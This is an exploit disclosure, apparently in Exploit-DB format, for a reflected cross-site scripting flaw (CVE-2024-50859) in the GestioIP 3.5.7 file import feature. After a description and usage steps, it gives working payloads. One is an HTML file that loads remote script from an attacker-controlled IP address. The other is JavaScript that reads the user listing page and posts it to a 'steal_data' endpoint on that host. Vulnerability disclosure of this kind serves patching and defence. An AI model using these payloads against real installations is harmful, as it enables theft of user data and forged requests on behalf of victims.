GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)

# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859

### Description

The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.


### Prerequisites

Enable (set to 'yes') the parameter:

Manage > Manage GestioIP > ACL connection management


### Usage

Select: import/export > Import ACLs/ACL Connections

Select: "Connection List"

Select "report only"

Browse to select the file you want to upload.

Click 'upload'



### Payloads

#### 1) html file to upload

<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>


#### 2) js file to exfiltrate data

var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();

response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);